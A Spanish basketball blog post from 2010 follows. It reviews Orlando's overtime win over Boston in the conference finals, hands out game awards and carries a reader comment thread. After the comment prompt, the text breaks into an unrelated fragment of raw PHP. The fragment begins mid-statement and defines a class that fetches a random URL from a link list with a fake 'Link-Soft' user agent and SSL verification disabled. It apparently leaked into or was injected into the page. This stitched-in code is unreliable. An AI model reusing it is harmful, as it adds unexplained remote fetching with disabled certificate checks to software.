Playoffs 24/05/2010: ¿Redención?

25 de May de 2010 por telekoman

Los Orlando Magic están consiguiendo lo impensable en el planeta NBA: que nadie sea capaz de acertar que es lo que van a hacer en el siguiente partido. Al principio de la serie se aventuraba que iban a pasar por encima de unos Celtics que si bien habían derrotado a los favoritos del Este, no tendrían nada que hacer ante el poderío interior de Howard. Nada más lejos de la realidad. Los dos primeros partidos en Orlando dejaron bien claro que los viejales verdes podían, simplemente a base de carácter, acogotar a un grupo ligeramente desorientado. El tercer partido, ya en Boston, confirmó lo visto, dejando en el aire una sensación de ridículo importante. Ya muy pocos (o ninguno) dábamos un duro por que los Magic lograran ganar ni siquiera un mísero partido en esta serie. Y de nuevo batacazo a las previsiones.

El partido no ha sido un dechado de virtudes por ninguno de los dos equipos, con casi más pérdidas que asistencias en el global y con unos porcentajes bastante normalitos. Pero Orlando ha sabido organizar su juego partiendo de Nelson para acabar en su centro inevitable, Howard. Ellos dos, con alguna aportación de Lewis, Barnes y Redick, han sido capaces de contrarrestrar parte del juego céltico.

Por los verdes hoy tocaba el partido de Pierce que pese a su nulo acierto en los triples (0 de 7 intentos) ha sido el mejor de su equipo con 34 puntos y 11 rebotes. Obviaremos su error en la jugada final que podía evitar la prórroga. Su mejor aliado ha sido Ray Allen con una exquisita serie de 5 de 7 triples. El resto del equipo bastante espeso y tan sólo Garnett aportando algo de garra. La prórroga se resolvió con 2 triples de Nelson contestados con otros 2 de Allen y 2 canastas de Howard que simplemente, no pudieron ser contestadas de ninguna manera.

La serie vuelve a Orlando con todas las incertidumbres del mundo. Es difícil que la serie se le escape a Boston, pero si los Magic ganan el siguiente partido y se ponen 2-3, veremos el verdadero carácter de los Celtics.

PREMIOS

MVP: Los 32 puntos y 16 rebotes de Howard merecen nuestra distinción, pero el acierto en la dirección y en los momentos puntuales de la prórroga de Nelson también.

Sorpresa: Visto lo visto, la sorpresa es que Orlando ganara el partido, pero como hablamos de jugadores nos quedaremos con el 71% de acierto en triples de Ray Allen. 5 de 7, 2 de ellos en la prórroga, cuando se cuece el pescado.

Decepción: Tan sólo 3 puntos de Vince Carter en el que podía ser el último partido de la temporada para su equipo. Poco, muy poco bagage para los 30 minutos que estuvo en pista.

Esfuerzo en vano: Como ya hemos comentado, Pierce luchó como un titán y cuajó un buen partido que lamentablemente no supo culminar con el tiro que podría haber evitado la prórroga, perdiendo el balón de una manera bastante infantil.

Y MAÑANA…

Esta noche tendremos el siguiente capítulo del culebrón Bynum en la otra parte del cuadro. ¿Jugará? ¿No jugará? ¿Jugará pero poco? Veremos si los Lakers son capaces de recuperar el nivel de acierto de los dos primeros partidos, ya que si no entre Amaré y Robin López pueden volver a hacer la vida imposible a Gasol.

Comenta

13 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Bueno, hemos salvado el primer match ball, al menos han mostrado los Magic su orgullo. lamentablemente, va a ser muy dificil ganarles 4 seguidos, toda la presión recae en Orlando, y ninguna en Boston que en el 5º choque saldrán a ganar pero sin ninguna presión. La parte positiva, que haciendo un encuentro normalito, los Magic han ganado en el Garden; la negativa, las lecciones que nos han dado los Jurasicos en el Amway.
    Muy mal hoy Carter, nefasto, menos mal que Redick nos mantuvo vivos en algunas fases del partido.
    Muy mal al final, desperdiciando una renta de 7 puntos a falta de 2 min.
    Van Gundy conoce a Ray Allen? por qué le dejan tirar solo?? por que nadie le puntea??
    Aunque Pierce es muy bueno, pienso que el ultimo balon a 9seg del final se lo deberia haber jugado Rondo, que domina mejor estas situaciones con sus penetraciones,
    Vaya leñazo de Howard a Garnett, pensé que lo iban a expulsar

      Citar

  2. TheDeerHunter dice:
    #2

    Yo no daba un duro por Orlando hoy. Es más, pensaba que ya bajaron los brazos definitivamente en el 3º. A estas alturas del curso y con el panorama que tenían lo más fácil es venirse abajo y pensar en el consuelo de las vacaciones.
    Todo cambia bastante. Lo siguen teniendo casi imposible, pero alguien tendrá que ser el primero algún día en lograrlo. Pasa por centrarse exclusivamente en el próximo partido que es su complicada cancha que en condiciones normales deberían lograr hacer valer.
    Después, con todo lo que ha llovido no está nada mal jugársela a una carta en Boston. Después de eso ya veríamos lo que pasa.

    Por otro lado tampoco hemos llegado a ver un partido medio normal de Orlando en conjunto.

      Citar

  3. pcerezo dice:
    #3

    Pues si ganan en Orlando y se ponen 3-2 la cosa cambia y mucho. Los Celtics dan señales muy claras de agotamiento.

      Citar

  4. Love Denise dice:
    #4

    Desafortunadamente para mí, yo no he visto los sintomas de agotamiento de los verdes, tampoco creo que los Celtics con tanta experiencia se pongan nerviosos si Orlando le gana el 5º choque, a no ser que le metan una tunda de 30 puntos,
    Que lastima no haber podido ganar al menos un partido en casa e ir 2-2, yo, aunque los Magic sean eliminados, sigo pensando que son mucho más equipo que Celtics, sólo que cuando Howard tiene el día, Carter no lo tiene y viceversa, y a Lewis todavía no le he visto.
    Insisto , Garnett no está acabado, pero ya no es un jugador determinante en ataque, aunque lo pueda ser por carisma, liderazgo, intensidad o defensa, pero en ataque no tiene nada qe ver con el de hace 2 años, creo que Gasol se lo comería en unas hipoteticas finales.

      Citar

  5. TheDeerHunter dice:
    #5

    Los Celtics han demostrado que su gran virtud no es éste o aquel jugador. Precisamente una de las virtudes que había logrado Van Gundy antes de esta ronda…
    No me planteo si Gasol se comería a Garnett, creo que posiblemente sería así… me planteo cómo moverían el balón los Lakers frente a la defensa “enjambre” que practican los Celtics. Después a correr como siempre hicieron. Ni en los mejores momentos del Big Three creo que el equipo necesitaba un capazo de puntos de ninguna de sus figuras. Lo que está claro es que ahora mismo no necesitan ni que Garnett llegue a los 20 puntos.

    Le tengo muchísimo respeto a la defensa que les he visto hacer estas dos series. Que Howard, Carter o Lewis no tengan el día simultáneamente no ha sido ni de lejos casualidades de la vida.

      Citar

  6. Love Denise dice:
    #6

    Ya lo dije en un comentario de hace unos días. La defensa de Celtics es buena, muy buena, pero también los Magic han fallado tiros relativamente cómodos. Lo dejo en un 50-50.
    Yo si creo que los Celtics necesitan a un mejor Garnett, si quieren derrotar a Lakers (en el supuesto de que ambos pasen la eliminatoria), no es lo mismo atacarle a Lewis (y aún así no ha hecho buenos %) que a pau.
    Tampoco es que el juego de los Lakers sea mover el balón todo el rato. Yo, más que nada veo jugadas personales de Kobe.

      Citar

  7. pcerezo dice:
    #7

    Espectacular, Nash jugará hoy 24 horas después de ser operado de la nariz. Nash va a acabar con más cicatrices que José Tomás….

      Citar

  8. Love Denise dice:
    #8

    si, la diferencia radica en que Nash no asesina ni tortura a nadie.;
    y por lo visto el mismo se volvio a colocar la nariz, este tio merece un anillo, y yo un buen sueño. hasta mña

      Citar

  9. TheDeerHunter dice:
    #9

    cuidadín con los comentarios LDenise… que lo último que nos faltaría es que esto se nos llenara de trolls pegándose por los toros o por el futbol

    un buen sueño a las 17h de la tarde… tú si que tienes moral, chico, con la serie de Orlando.

      Citar

  10. Viva_Dirk dice:
    #10

    Pues si ‘mas que nada ves jugadas personales de Kobe’ no creo que hallas visto ni un solo partido de los Lakers en estos play-offs.

      Citar

  11. Jabho dice:
    #11

    Yo creo que era normal que Orlando ganara un partido… e incluso que gane este en su casa entra dentro de lo esperable. Son unas finales de conferencia y lo normal es que sudes tinta para llegar a la final.

    Boston hoy no ha salido bien y ha concedido 30 puntos en el primer cuarto que es mucho. Cuando ha querido ganar no ha podido, aunque ha tenido sus opciones. Partidazo de Pierce pero flojo hoy Rondo y poca intendencia…No me ha dejado preocupado el partido y como decía Ldenise Orlando no ha sabido matar el partido que tenia de cara y ha tirado una renta de 7 puntos a falta de 2 minutos, ha concedido tiros fáciles a Allen… En fin, que lo sigo viendo verde

      Citar

  12. kantonyo dice:
    #12

    Bueno sin querer entrar al trapo, además dejo claro que estoy en contra del maltrato al toro, si somos justos, José Tomas tampoco ha maltratado a nadie que se sepa, ya que según la RAE: nadie: “ninguna persona”.

    Hablando de NBA. Creo que una victoria de Orlando puede meter bastante miedo a Boston y provocar desconfianza… Esta derrota de Celtics hace más daño de lo que parece. Si Boston acaba ganando fácil en Orlando, entonces no habrá más que hablar y no habrá excusas para Magic, se demostrará que Celtics es muchisimo mejor equipo.

      Citar

  13. Love Denise dice:
    #13

    perdona Deer por el comentario, joer kantonyo que “tikismikis” con la RAE jjeje, lo dejo en un “ser vivo” y dejamos el tema, ok?? no te enfades ehhh 🙂

    Se puede estar de acuerdo o en descauerdo con los comentarios, pero no me parece correcto acusar a nadie de que no ve partidos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>